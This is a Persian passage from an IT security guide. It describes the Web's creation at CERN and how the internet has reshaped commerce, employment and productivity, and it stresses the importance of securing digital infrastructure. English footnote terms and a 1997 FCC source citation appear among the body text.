‫ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ‪ ٣‬ﻛﻪ ﺗﻮﺳﻂ ﺗﻴﻢ ﺑﺮﻧﺮﺯ ﻟﻲ‪ ٤‬ﻭ ﺭﺍﺑـﺮﺕ ﻛـﺎﻳﻠﻴﻮ‬
‫ﺩﺭ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻫﺴﺘﻪﺍﻱ ﺍﺭﻭﭘﺎ‪ ٦‬ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ‪ ۹۰‬ﻣﻴﻼﺩﻱ ﻭ‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺟﻬـﺎﻧﻲ ﺑﻬـﺮﻩ ﺟـﺴﺘﻪ ﻭ‬
‫ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺟﺬﺍﺑﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺗﺐ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﻫﺮ ﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺗﻔـﺎﻭﺗﻲ ﻣﻴـﺎﻥ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﻭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺋﻞ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﻭﻟـﻲ ﺩﺭ ﻭﺍﻗـﻊ ﻭﺏ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ‬
‫ﺧﺪﻣﺎﺕ‪) ٧‬ﻭ ﺍﻟﺒﺘﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ( ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭ‬
‫ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﺒـﺪﻳﻞ‬
‫ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻃﻲ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺍﺑـﺰﺍﺭ ﻣﻬـﻢ ﺍﺭﺗﺒـﺎﻃﻲ ﻣﻴـﺎﻥ‬
‫ﺗﻤﺎﻣﻲ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﻣﺎ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺁﻧـﻲ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺧﺘـﺼﺎﺻﻲ‪ ،‬ﺗﻤـﺎﻣﻲ ﺍﻧـﻮﺍﻉ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺗﺠﺎﺭﻱ‪ ،‬ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﺑـﻪ ﺁﻥ‬
‫ﻭﺍﺑﺴﺘﻪ ﺍﻳﻢ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ‬
‫ﻣﻮﻓﻘﻴﺖ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺪﺍﻭﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻳـﻚ ﻋﺎﻣـﻞ‬
‫ﺣﻴﺎﺗﻲ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺍﻫﻤﻴﺖ ﺁﻥ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫـﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪ .‬ﺁﺛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﻭ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻠﻪ ﺍﺯ ﺍﻧﻘﻼﺏ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺮﺯ ﻓﻮﺍﻳـﺪ ﻣـﺴﺘﻘﻴﻢ ﺁﻧﻬـﺎ‬
‫ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺰ ﺩﺭ ﺭﺍﻩ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻭﻝ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻛﻤﺮﻧﮓ ﻛﺮﺩﻩ ﻭ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋـﻪ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺗﺴﻬﻴﻞ ﻧﻤﻮﺩﻩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﻛـﺴﻲ‬
‫ﻣﺴﺘﻘﻞ ﺍﺯ ﻣﺤﻞ ﻓﻴﺰﻳﻜﻲ ﺧﻮﺩ ﻗﺎﺩﺭ ﺑﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺁﻥ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ‪ ٨‬ﺑـﺮ ﺭﻭﻧـﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺗـﺄﺛﻴﺮﻱ‬
‫ﻣﻀﺎﻋﻒ ﺩﺍﺷﺘﻪﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻧﺘﺎﻳﺞ ﺟﺴﺘﺠﻮ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﻇﺎﻫﺮ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺩﺍﺭﺩ؛‬
‫ﺏ ﻛﺎﺭﺧﺎﻧﺠــﺎﺕ ﻭ ﺷــﺮﻛﺘﻬﺎﻱ ﻭﺍﻗــﻊ ﺩﺭ‬
‫ﺑﻄﻮﺭﻳﻜــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻳﻜـﺴﺎﻧﻲ‬
‫ﺑﺮﺍﻱ ﻧﻈﺎﺭﻩﺷﺪﻥ ﺗﻮﺳﻂ ﻣﺮﺍﺟﻌﻴﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪٥‬‬
‫ﺩﺭ ﺷﻬﺮ ﮊﻧﻮ ﺍﻳﺠﺎﺩ ﺷﺪ ﺳﺮﻭﻳﺲ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ‬
‫‪Digital Tornado: The Internet and‬‬
‫‪Telecommunications Policy FCC Staff‬‬
‫‪Working Paper on Internet Policy (1997):‬‬
‫‪http://www.fcc.gov/Bureaus/Miscellaneous/Ne‬‬
‫‪ws_Releases/1997/nrmc7020.html‬‬
‫‪U.S. Bureau of Census‬‬
‫‪World-Wide Web‬‬
‫‪Tim Berners-Lee‬‬
‫‪Robert Cailliau‬‬
‫‪Center for European Nuclear Research‬‬
‫)‪(CERN‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫ﺩﻭﻣﻴﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺄﺛﻴﺮﻱ ﺷﮕﺮﻑ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ‬
‫ﺣﺬﻑ ﻭﺍﺳﻄﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑــﻪ ﻛــﺎﻫﺶ ﭼــﺸﻤﮕﻴﺮ ﻧــﺮﺥ ﺍﺳــﺘﺨﺪﺍﻡ ﻣﻨــﺸﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺍﺷﺎﺭﻩﻛﺮﺩ ﻛﻪ ﺩﻟﻴﻞ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻮﺷﺘﻦ ﻣﺘﻦ ﻭ‬
‫ﭼﺎﭖ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺷﺨﺼﻲ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻃﺮﻳـﻖ ﺗـﺴﻬﻴﻼﺗﻲ‬
‫ﭼﻮﻥ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ ﻭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺩﻳﻜﺘـﻪ‬
‫ﻛــﺮﺩﻥ ﻣــﺘﻦ ﺑــﺮﺍﻱ ﻳــﻚ ﻣﻨــﺸﻲ ﺍﺳــﺖ‪ .‬ﺑــﻪ ﻫﻤــﻴﻦ ﺗﺮﺗﻴــﺐ‬
‫‪Services‬‬
‫‪Search Engine‬‬
‫‪7‬‬
‫‪8‬‬
‫‪٢٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻱ ﺩﺳﺘﻪﺟﻤﻌﻲ ﻧﻴﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺭﻭ ﺑﻪ ﺍﻧﻘﺮﺍﺽ ﺍﺳﺖ‪،‬‬
‫ﮔﺮﺩﺷﮕﺮ ﹺ‬
‫ﭼﺮﺍﻛﻪ ﮔﺮﺩﺷـﮕﺮﺍﻥ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑﻠﻴﻄﻬـﺎﻱ ﻫـﻮﺍﻳﻲ ﻳـﺎ ﻗﻄـﺎﺭ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﺗﺎﻗﻬﺎﻱ ﻫﺘﻞ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑـﺮﺧﻂ‪ ٩‬ﺭﺯﺭﻭ‬
‫ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺖ ﻣـﺸﺘﺮﻱ‬
‫ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﺑﺘﻮﺍﻥ ﺑﺎ ﻛﻤﻲ ﺩﻗﺖ ﺭﻭﻱ ﺳﻔﺎﺭﺷﺎﺕ‪ ،‬ﺍﺯ ﻳـﻚ‬
‫ﺳﻔﺮ ﻣﻔﺮﺡ ﻟـﺬﺕ ﺑـﺮﺩ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺷـﺮﻛﺘﻬﺎﻱ ﻓﺮﻭﺷـﻨﺪﺓ ﻛﺘـﺎﺏ‪،‬‬
‫ﻣﻮﺳﻴﻘﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺑـﺮﺧﻂ ﻣﻮﺟـﺐ‬
‫ﺗﻬﺪﻳــﺪ ﻭ ﺿــﺮﺑﻪ ﺑــﻪ ﻓﺮﻭﺷــﮕﺎﻫﻬﺎﻱ ﻋﺮﺿــﻪﻛﻨﻨــﺪﺓ ﺍﻳﻨﮕﻮﻧــﻪ‬
‫ﻣﺤﺼﻮﻻﺕ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺍﻳﻦ‬
‫ﺻﻨﻒ ﺑﻪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﺪﻥ ﻃﻴﻒ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﻧﻴﺰ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺣﺮﻓـﻪﻫـﺎ ﻭ ﺻـﻨﺎﻳﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺧـﻮﺩ ﺍﺩﺍﻣـﻪ‬
‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺗﻤﺎﻳﻞ ﺩﺍﺭﻧﺪ ﺍﻓﺮﺍﺩ ﻛﻤﺘـﺮﻱ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭﺁﻭﺭﻧـﺪ ﻭ‬
‫ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠـﺎﻱ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻋﻤـﻮﻣﻲ ﺑـﻪ ﺳـﻤﺖ‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺣﺮﻛﺖ ﻛﻨﻨﺪ‪ .‬ﺗﺄﺛﻴﺮﺍﺕ ﻣﺸﻬﻮﺩ ﺭﻭﻧـﺪ ﺣـﺬﻑ‬
‫ﻭﺍﺳﻄﻪﻫﺎ ﻛﻪ ﺑﺎ ﻇﻬﻮﺭ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺷـﺮﻭﻉ ﺷـﺪ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ‬
‫ﻃﻮﻻﻧﻲ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﻳﺎﻓـﺖ ﻭ ﺑـﺎ ﺍﻫﻤﻴـﺖ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺻﻨﺎﻳﻊ ﻭ ﺣﺮﻓﻪﻫﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺑﺎ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﺧﻮﺍﻫﻨﺪ‬
‫ﺷﺪ‪.‬‬
‫ﺳﻮﻣﻴﻦ ﭘﻴﺎﻣﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﺥ ﺑﻬـﺮﻩﻭﺭﻱ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺻـﻨﺎﻳﻊ‬
‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﺘﺎﺑﻲ ﭼﺸﻤﮕﻴﺮ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ‬
‫ﻳﺎﻓﺖ‪ .‬ﺑﻪ ﻛﻤـﻚ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻣﻜـﺎﻥ ﺍﺭﺳـﺎﻝ ﻭ ﺗﺒـﺎﺩﻝ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻃﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﺛﺎﻧﻴـﻪ ﻣﻤﻜـﻦ ﺷـﺪﻩ‪،‬‬
‫ﺑﻄﻮﺭﻳﻜﻪ ﻣﺒﺎﺣﺚ ﻭ ﻣﺬﺍﻛﺮﺍﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ‬
‫ﺍﺯ ﮔﺬﺷﺘﻪ ﭘﻴﮕﻴﺮﻱ ﻛﺮﺩ ﻭ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳﺎﻧﺪ‪ .‬ﺍﻣﻮﺭ ﺑﺎﺯﺭﮔﺎﻧﻲ ﻛﻪ ﺗـﺎ‬
‫ﭼﻨﺪﻱ ﻗﺒﻞ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ‪ ،‬ﺗﻠﻜﺲ ﻭ ﺗﻠﻔـﻦ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﺪﻧﺪ‬
‫ﺍﻛﻨﻮﻥ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻔﺎﻫﻴﻤﻲ ﻧﻮﻳﻦ ﺩﺭ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺳـﻴﺎﺭ‪،‬‬
‫ﺳﺮﻳﻌﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣـﻲﺭﺳـﻨﺪ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﭼﺮﺧـﺔ‬
‫ﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﻳﻤﻦ ﻧﮕﺎﻩ ﺩﺍﺷـﺘﻦ ﻣﺤـﻞ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﺟﺪﻳـﺪ ﺍﻟﺰﺍﻣـﻲ‬
‫ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﺗﻜﺎﭘﻮﻱ ﻳﺎﻓﺘﻦ ﺭﺍﻫﻲ‬
‫ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺧــﻮﺩ ﻫــﺴﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛــﻪ‬
‫ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺁﻥ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﻭﺟـﻮﺩ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻧـﺎﺍﻣﻦ ﺩﺭ ﺁﻥ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨـﺎﻥ ﻭ ﺍﻋﺘﻤـﺎﺩ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ‪،‬‬
‫ﺷﺒﻜﻪ ﻭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤﻴﻄـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫‪Online‬‬
‫‪9‬‬
‫ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﺑﺮ ﺍﺳﺎﺱ ﮔﻔﺘﮕﻮﻫـﺎﻱ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﻧﺠـﺎﻡ ﻣـﻲﮔﻴـﺮﺩ‬
‫ﻛﻤﺎﺑﻴﺶ ﺍﺯ ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﻣﻄﻠﺐ ﺩﺭ ﻣﻮﺭﺩ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻭﺍﺿﺢ ﺍﺳـﺖ‪:‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ ﺩﺭ ﺯﻳـﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺧﻮﺩ ﺩﺳﺖ ﻧﻴﺎﻓﺘﻪ ﻭ ﺍﺯ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﻳﺶ ﺑـﻪ‬
‫ﻧﺤﻮ ﻣﻄﻠﻮﺑﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﻨﺪ ﺷﺎﻳﺴﺘﺔ ﺍﻋﺘﻤﺎﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑـﻮﺩ‬
‫‪١٠‬‬
‫ﻭ ﺍﺯ ﻛﺎﺭﻭﺍﻥ ﺍﻗﺘﺼﺎﺩ ﻧﻮﻳﻦ ﺟﻬﺎﻧﻲ ﻋﻘﺐ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ‪.‬‬
‫ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﻣﺮﻭﺯﻩ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺯ ﺣﻴﻄﺔ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻓﺮﺍﺗـﺮ ﺭﻓﺘـﻪ ﺍﺳـﺖ‪.‬‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺻﻨﻌﺖ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﻣﻜﺎﻥ ﺳﺎﺧﺖ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻘﻴﺎﺳﻬﺎﻱ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ ﺭﺍ‬
‫ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻛﻨﻮﻥ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ‬
‫ﻭ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺭﺍ ﺩﺭ ﺟﻴﺐ ﺧﻮﺩ ﺟﺎﻱ ﺩﻫﻴﺪ‪ .‬ﻋـﻼﻭﻩ‬
‫ﺑﺮ ﺍﻳﻦ ﺑﻬﺒﻮﺩ ﻧﺴﺒﺖ ﻗﻴﻤﺖ ﺑﻪ ﻛﺎﺭﺁﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ‬
‫ﻫﺮ ﺳﺎﻝ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ‪ %۳۰‬ﺍﺳـﺖ ﻭ ﺍﺣﺘﻤـﺎﻝ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻳـﻦ‬
‫ﻧﺴﺒﺖ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳـﺖ‪ ١١.‬ﺍﻧﺘﻈـﺎﺭ ﻣـﺎ ﺍﻳـﻦ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻘﺒﺎﻝ ﮔـﺴﺘﺮﺩﻩ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ‬
‫ﻋﺮﺻﻪﻫﺎﻱ ﻧﻮﻳﻨﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ﻭ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑـﺮﺍﻱ‬
‫ﺁﻏﺎﺯ ﻋﺼﺮ ﻃﻼﻳﻲ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﻼ ﺩﻳﺠﻴﺘــﺎﻟﻲ ﻫــﺴﺘﻨﺪ ﻭ‬
‫ﺗﺠﻬﻴــﺰﺍﺕ ﺗﻠﻔﻨــﻲ ﻣــﺪﺭﻥ ﺍﻣــﺮﻭﺯ ﻛــﺎﻣ ﹰ‬
‫ﺳﻴـــﺴﺘﻤﻬﺎﻱ ﻫﺪﻓﻤﻨـــﺪ ﺭﺍﻳﺎﻧـــﻪﺍﻱ ﺟـــﺎﻳﮕﺰﻳﻦ ﺗﺠﻬﻴـــﺰﺍﺕ‬
‫‪ Switching‬ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻟﺔ ﻣﻜﺎﻧﻴﻜﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﺯ ﺯﻣﺎﻥ ﭘﻴﺪﺍﻳﺶ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫـﺔ ‪ ۸۰‬ﻣـﻴﻼﺩﻱ‪ ،‬ﺻـﺪﺍ ﻭ ﻣﻮﺳـﻴﻘﻲ‬
‫ﺷﻜﻞ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻪ ﺧﻮﺩ ﮔﺮﻓﺘﻪ ﻭ ﺑـﺎ ﭘﻴـﺪﺍﻳﺶ ﻗﺎﻟـﺐ ﻣﻮﺳـﻴﻘﻲ‬
‫‪ MP3‬ﺩﺭ ﺍﻭﺍﺧــﺮ ﺩﻫــﺔ ‪ ۹۰‬ﻣــﻴﻼﺩﻱ ﺿــﺒﻂ ﺻــﺪﺍ ﺣﺘــﻲ ﺩﺭ‬
